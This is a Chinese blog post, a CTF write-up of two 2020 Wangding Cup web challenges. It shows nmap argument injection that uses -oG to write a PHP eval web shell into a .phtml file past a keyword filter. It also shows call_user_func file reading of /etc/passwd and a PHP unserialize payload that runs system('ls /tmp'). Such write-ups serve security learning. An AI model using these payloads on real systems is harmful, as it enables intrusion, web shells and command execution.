2020网鼎杯朱雀组WEB——NMAP&PHPWEB

最新推荐文章于 2024-04-25 17:22:00 发布
最新推荐文章于 2024-04-25 17:22:00 发布
阅读量4.1k 收藏 3
点赞数
文章标签: 信息安全 php shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Pdsdt1/article/details/106199660
版权

NMAP

考察的是比较老的知识点了,在BUU出现过的题目,nmap命令行参数注入

详细文章:

https://blog.csdn.net/qq_26406447/article/details/100711933

访问题目,发现我们可以输入url,经过nmap扫描后会返回出结果,这里引入nmap命令中的一个参数

image.png-26.5kB

-oG #可以实现将命令和结果写到文件

源码大概的构造:

echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);

我们可以通过这种思路,拼接单引号,达到控制参数的目的,从而将我们构造的shell写入文件中

直接使用BUU题目中的payload进行测试

' <?php @eval($_POST["hack"]);?> -oG hack.php '

image.png-27.5kB

提示我们Hacker,应该存在黑名单,fuzz发现,php被过滤了,我们再次构造一下代码

' <?= @eval($_POST["pd"]);?> -oG pd.phtml '

这里使用“=”绕过文件中的php字符,使用“phtml”绕过对“php”文件后缀的检测,再次输入

image.png-28.8kB

image.png-31.7kB

没有提示其他黑名单信息,尝试访问我们构造的页面pd.phtml,构造shell

image.png-117.3kB

成功执行代码命令,获取flag

image.png-90kB

PHPWEB

进入题目,发现右上角有时间显示,看一下POST数据包

image.png-277.6kB

发现传输了两个参数,抓包看一下

image.png-12.1kB

我们发现func参数调用了函数date(),p参数调用了函数date中填写的时间格式,我们尝试构造一下,查看能否代码执行,首先尝试读取index.php的文件

readfile("index.php");

我们构造如下语句

func=readfile&p=index.php

发现成功读取源码

image.png-36.7kB

<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
    }else {
        die("Hacker...");
    }
}
?>

审计一下代码,发现过滤了很多函数,但是不影响我们读取文件,同时我们发现,存在魔法函数,我们也可以通过构造反序列化代码,来达到绕过黑名单,执行system等函数的目的,尝试目录穿越读取文件

image.png-15.3kB

发现可以直接读取/etc/passwd下文件,但是在读取根目录下flag时,无法读出,猜测flag存在其他目录,或者flag非正常名称,我们需要构造系统命令进行目录查看,这是我们可以构造反序列化代码,在搜索tmp目录下是发现flag文件

payload:

class Test {
    public $p = "ls /tmp";
    public $func = "system";
}
$c=new Test();
$d=serialize($c);
echo $d;

O:4:"Test":2:{s:1:"p";s:7:"ls /tmp";s:4:"func";s:6:"system";}

构造传输代码:

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:7:"ls /tmp";s:4:"func";s:6:"system";}

即可发现目录下flag文件

image.png-33.7kB

使用readfile读取文件,即可获取flag

image.png-43.1kB

Pdsdt1
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebMap:WebMap-Nmap Web 仪表板和报告
05-30
Nmap XML 报告的 Web 仪表板 目录 截屏 用法 您应该将它与 docker 一起使用,只需发送以下命令: $ mkdir /tmp/webmap $ docker run -d \ --name webmap \ -h webmap \ -p 8000:8000 \ -v /tmp/webmap:/opt/xml \ reborntc/webmap $ # now you can run Nmap and save the XML Report on /tmp/webmap $ nmap -sT -A -T4 -oX /tmp/webmap/myscan.xml 192.168.1.0/24 现在将浏览器指向http://localhost:8000 生成新令牌 为了访问 W
Web应用安全:Nmap扫描原理与用法.docx
06-18
Nmap扫描原理与用法 摘 要:通过本节介绍,让学生了解Nmap的扫描原理和Nmap的用法。 关键词:Nmap;端口扫描;渗透测试;Web安全 Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字Nmap是Network Mapper的简称。Nmap最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下,该工具逐渐成为最为流行安全必备工具之一。详情请参见:。 一般情况下,Nmap用于列举网络主机清单、管理服务升级调度、监控主机或服务运行状况。Nmap可以检测目标机是否在线、端口开放情况、侦测运行的服务类型及版本信息、侦测操作系统与设备类型等信息。 一、Nmap介绍 1、Nmap的优点 灵活。支持数十种不同的扫描方式,支持多种目标对象的扫描。 强大。Nmap可以用于扫描互联网上大规模的计算机。 可移植。支持主流操作系统:Windows/Linux/Unix/MacOS等等;源码开放,方便移植。 简单。提供默认的操作能覆盖大部分功能,基本端口扫描nmap targetip,全面的扫描nma
Web应用安全:Nmap全连接扫描.pptx
06-18
Nmap全连接扫描 1 背景知识—TCP连接的三次握手 2 全连接的介绍 3 Nmap全连接扫描实例 目录 TCP连接的三次握手 1. 第一次握手: 客户端给服务器发送一个SYN段, 该段中也包含客户端的初始序列号J。 2. 第二次握手: 服务器返回客户端 SYN K +ACK 段, 该段中包含服务器的初始序列号;同时使 ACK= J + 1来表示确认已收到客户端的 SYN段。 3. 第三次握手: 客户端给服务器响应一个ACK段 , 该段中使 ACK = K + 1来表示确认已收到服务器的 SYN段。 TCP连接的三次握手 SYN是同步的缩写,SYN 段是发送到另一台计算机的 TCP 数据包,请求在它们之间建立连接 ACK 是“确认”的缩写。 ACK 数据包是任何确认收到一条消息或一系列数据包的 TCP 数据包 全连接的介绍 Nmap全连接扫描可以提供可靠的站点端口开放信息和端口服务器信息。 Nmap全连接扫描发现开放端口,发现攻击点。一个端口就是一个潜在的通信通道,也就是一个入侵通道。对目标计算机进行全连接扫描,能得到许多有用的信息。 1.Nmap全连接扫描的目的 全连接的介绍 当发
Web应用安全:Nmap半连接扫描(实验).docx
06-19
Nmap半连接扫描 一、实验目的 掌握nmap的相关知识; 熟悉nmap工具的使用; 掌握nmap半连接扫描的相关知识; 掌握nmap半连接扫描的操作。 二、实验内容 使用Nmap完成一次站点的半连接扫描; 使用Wireshark工具对半连接扫描的TCP包进行分析; 对半连接和全连接扫描对比分析。 实验内容与步骤 1、使用Nmap完成一次站点半连接扫描 1.1、本次我们选择Nmap官方给出的测试站点(scanme.nmap.org)进行半连接扫描。首先进入到nmap的文件里面,然后在改文件夹下打开cmd窗口。 1.2、首先输入nmap查看nmap是否正常安装并且可以使用。如果显示nmap信息和帮助文档的话,表明nmap已经正常安装并且可以使用了。 1.3、开启Wireshark工具对本机开始抓包(Wireshark工具可以直接在官网免费下载)。 将Wireshark的过滤器设置为tcp然后选择WLAN端口(如果是wifi连接的话)。 1.4、然后在刚刚的cmd窗口输入nmap半连接扫描命令:nmap -sS scanme.nmap.org,开始进行半连接扫描,与此同时也开启Wiresh
[网鼎杯 2020 朱雀]phpweb
最新发布
m_de_g的博客
04-25 298
【代码】[网鼎杯 2020 朱雀]phpweb
Web应用安全:Nmap参数介绍.pptx
06-19
Nmap参数介绍 1 Nmap简介 2 Nmap的安装 3 Nmap的参数介绍 目录 Nmap简介 Nmap(the Network Mapper)是一款免费开源的网络发现和安全审计工具 Nmap最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下,该工具逐渐成为最为流行安全必备工具之一。 一般情况下,Nmap用于列举网络主机清单、管理服务升级调度、监控主机或服务运行状况。Nmap可以检测目标机是否在线、端口开放情况、侦测运行的服务类型及版本信息、侦测操作系统与设备类型等信息。 常用于安全审核。许多系统管理员和网络管理员也用它来做一些日常的工作,比如查看整个网络的信息,管理服务升级计划。 Nmap简介 ZenmapNmap官方提供的图形界面,通常随Nmap的安装包发布。 Zenmap是用Python语言编写而成的开源免费的图形界面。 Zenmap旨在为nmap提供更加简单的操作方式。 简单常用的操作命令可以保存成为profile,用户扫描时选择profile即可; 可以方便地比较不同的扫描结果; 提供网络拓扑结构(NetworkTopology)的图形显示功能
BUUCTF [网鼎杯 2020 朱雀] Nmap
Senimo
12-09 3450
BUUCTF [网鼎杯 2020 朱雀] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
[网鼎杯 2020 朱雀]Nmap(双解详细分析)
记录学习,一起进步
01-29 1028
[网鼎杯 2020 朱雀]Nmap
[网鼎杯 2020 朱雀]Nmap
qq_75005708的博客
11-25 562
2.利用-iL 和-oN。如果使用-iL-,nmap就会从标准输入stdin读取主机名字。经过escapeshellcmd处理后变成’172.17.0.2’\’’ -v -d a=1’,这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义。经过escapeshellarg处理后变成了’172.17.0.2’’’ -v -d a=1’,即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。发现与刚刚的页面不一样,说明是可以进行命令执行的,但是|被\转义了,尝试;
2020-网鼎杯-朱雀-Web-nmap
feng的博客
11-03 789
WP 和BUUCTF里的2018 Online Tool非常类似。 首先就是中是个nmap命令注入,有2个方式: 利用-oG,可以将命令和结果写进文件。 利用-iL 和-oN。其中-iL是从inputfilename文件中读取扫描的目标。在这个文件中要有一个主机或者网络的列表,由空格键、制表键或者回车键作为分割符。如果使用-iL-,nmap就会从标准输入stdin读取主机名字。你可以从指定目标一节得到更加详细的信息,-oN是把扫描结果重定向到一个可读的文件logfilename中。 关于escapesh
[网鼎杯 2020 朱雀]Nmap wp
qq_64201116的博客
08-24 785
2020朱雀杯]和的题目似乎是一样的,不同在于朱雀杯没有给出源码,主要考察的都是nmap一句话木马写入。本篇文章细致讲解输入时和两个函数所进行的步骤。
BUUCTF: [网鼎杯 2020 朱雀]Nmap
末初的CSDN博客
09-21 1970
是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法写入,尝试写入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤,比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。,那说明导出的文件格式是。即便执行失败也无所谓,
[⽹鼎杯 2020 朱雀]Nmap
zzqzzq11的博客
12-03 405
要值得⼀提的是,这个弄完之后会有很多转译符,原因在于本来nmap就是执⾏相关的,因此很多都需要转译,⽐如 | > < { \ ' " 等等。这个题和上⾯那个nmap是⼀样的。只是过滤了下php罢了。其实就是参数值跳出来变成参数选项。细节之前已经说的差不多了。⽤phtml绕过就⾏。前⾯已经分析得很多了。
[网鼎杯 2020 朱雀]Nmap 通过nmap写入木马 argcmd过滤实现逃逸
m0_64180167的博客
09-19 343
这道题也很好玩 啊 原本以为是ssrf 或者会不会是rce结果是通过nmap写入木马我们来玩一下。
第五十六题——[网鼎杯 2020 朱雀]Nmap
分享简单的安全技术
04-29 310
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,一个输入框,让我们输入nmap扫描的ip地址 第二步:获取flag 可以使用命令 -oG制作一句话木马,输入' <?php @eval($_POST["hack"]);?> -oG hack.php '发现提示hacker,猜测不能使用php关键字 输入' <?= @eval($_POST["hack"]);?> -oG hack.phtml '发现语句执行成功 使用蚁剑连接地址http
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络拓扑等。nmap具有强大的扫描功能和灵活的配置选项,是网络安全工作者必备的工具之一。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值